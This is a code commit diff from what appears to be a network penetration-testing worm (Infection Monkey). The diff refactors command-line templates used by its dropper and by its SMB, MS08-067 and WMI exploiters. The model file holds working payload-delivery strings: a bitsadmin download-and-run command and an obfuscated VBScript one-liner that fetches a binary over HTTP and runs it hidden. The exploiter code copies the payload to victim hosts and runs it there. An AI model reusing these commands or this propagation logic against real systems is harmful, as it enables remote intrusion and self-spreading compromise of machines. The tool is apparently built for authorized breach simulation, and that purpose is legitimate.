parent
9f93fb8310
commit
57e69fafee
|
@ -8,7 +8,7 @@ import logging
|
|||
import subprocess
|
||||
import argparse
|
||||
from ctypes import c_char_p
|
||||
from model import MONKEY_CMDLINE, MONKEY_CMDLINE_LINUX
|
||||
from model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX
|
||||
from config import WormConfiguration
|
||||
from system_info import SystemInfoCollector, OperatingSystem
|
||||
|
||||
|
@ -93,20 +93,23 @@ class MonkeyDrops(object):
|
|||
except:
|
||||
LOG.warn("Cannot set reference date to destination file")
|
||||
|
||||
if OperatingSystem.Windows == SystemInfoCollector.get_os():
|
||||
monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path']}
|
||||
else:
|
||||
monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_path': self._config['destination_path']}
|
||||
|
||||
|
||||
monkey_options = ""
|
||||
if self.opts.parent:
|
||||
monkey_cmdline += " -p %s" % self.opts.parent
|
||||
monkey_options += " -p %s" % self.opts.parent
|
||||
if self.opts.tunnel:
|
||||
monkey_cmdline += " -t %s" % self.opts.tunnel
|
||||
monkey_options += " -t %s" % self.opts.tunnel
|
||||
if self.opts.server:
|
||||
monkey_cmdline += " -s %s" % self.opts.server
|
||||
monkey_options += " -s %s" % self.opts.server
|
||||
if self.opts.depth:
|
||||
monkey_cmdline += " -d %s" % self.opts.depth
|
||||
monkey_options += " -d %s" % self.opts.depth
|
||||
|
||||
if OperatingSystem.Windows == SystemInfoCollector.get_os():
|
||||
monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options
|
||||
else:
|
||||
dest_path = self._config['destination_path']
|
||||
monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_filename': dest_path.split("/")[-1]} + monkey_options
|
||||
monkey_cmdline = GENERAL_CMDLINE_LINUX % {'monkey_directory': dest_path[0:dest_path.rfind("/")],
|
||||
'monkey_commandline': monkey_cmdline}
|
||||
|
||||
monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
|
||||
stdin=None, stdout=None, stderr=None,
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import sys
|
||||
from logging import getLogger
|
||||
from model.host import VictimHost
|
||||
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
|
||||
from model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS
|
||||
from exploit import HostExploiter
|
||||
from network.tools import check_port_tcp
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
|
@ -99,9 +99,9 @@ class SmbExploiter(HostExploiter):
|
|||
|
||||
# execute the remote dropper in case the path isn't final
|
||||
if remote_full_path.lower() != self._config.dropper_target_path.lower():
|
||||
cmdline = DROPPER_CMDLINE_DETACHED % {'dropper_path': remote_full_path}
|
||||
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path}
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}
|
||||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path}
|
||||
|
||||
cmdline += build_monkey_commandline(host, depth - 1)
|
||||
|
||||
|
|
|
@ -12,7 +12,7 @@ import socket
|
|||
from enum import IntEnum
|
||||
from logging import getLogger
|
||||
from model.host import VictimHost
|
||||
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
||||
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
||||
from . import HostExploiter
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
|
@ -249,9 +249,9 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
|
||||
# execute the remote dropper in case the path isn't final
|
||||
if remote_full_path.lower() != self._config.dropper_target_path.lower():
|
||||
cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}
|
||||
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
|
||||
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
|
||||
|
||||
cmdline += build_monkey_commandline(host, depth - 1)
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@ import ntpath
|
|||
import logging
|
||||
import traceback
|
||||
from tools import build_monkey_commandline
|
||||
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
||||
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
||||
from model.host import VictimHost
|
||||
from exploit import HostExploiter
|
||||
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login
|
||||
|
@ -84,9 +84,9 @@ class WmiExploiter(HostExploiter):
|
|||
return False
|
||||
# execute the remote dropper in case the path isn't final
|
||||
elif remote_full_path.lower() != self._config.dropper_target_path.lower():
|
||||
cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}
|
||||
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
|
||||
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
|
||||
|
||||
cmdline += build_monkey_commandline(host, depth - 1)
|
||||
|
||||
|
|
|
@ -4,12 +4,12 @@ __author__ = 'itamar'
|
|||
|
||||
MONKEY_ARG = "m0nk3y"
|
||||
DROPPER_ARG = "dr0pp3r"
|
||||
DROPPER_CMDLINE = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
|
||||
# TODO: rename to WINDOWS/LINUX appropriately
|
||||
MONKEY_CMDLINE = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||
MONKEY_CMDLINE_LINUX = './%%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||
DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
|
||||
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||
DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
|
||||
MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||
MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, )
|
||||
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
|
||||
DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
|
||||
MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
|
||||
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
|
||||
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
|
||||
|
|
Loading…
Reference in New Issue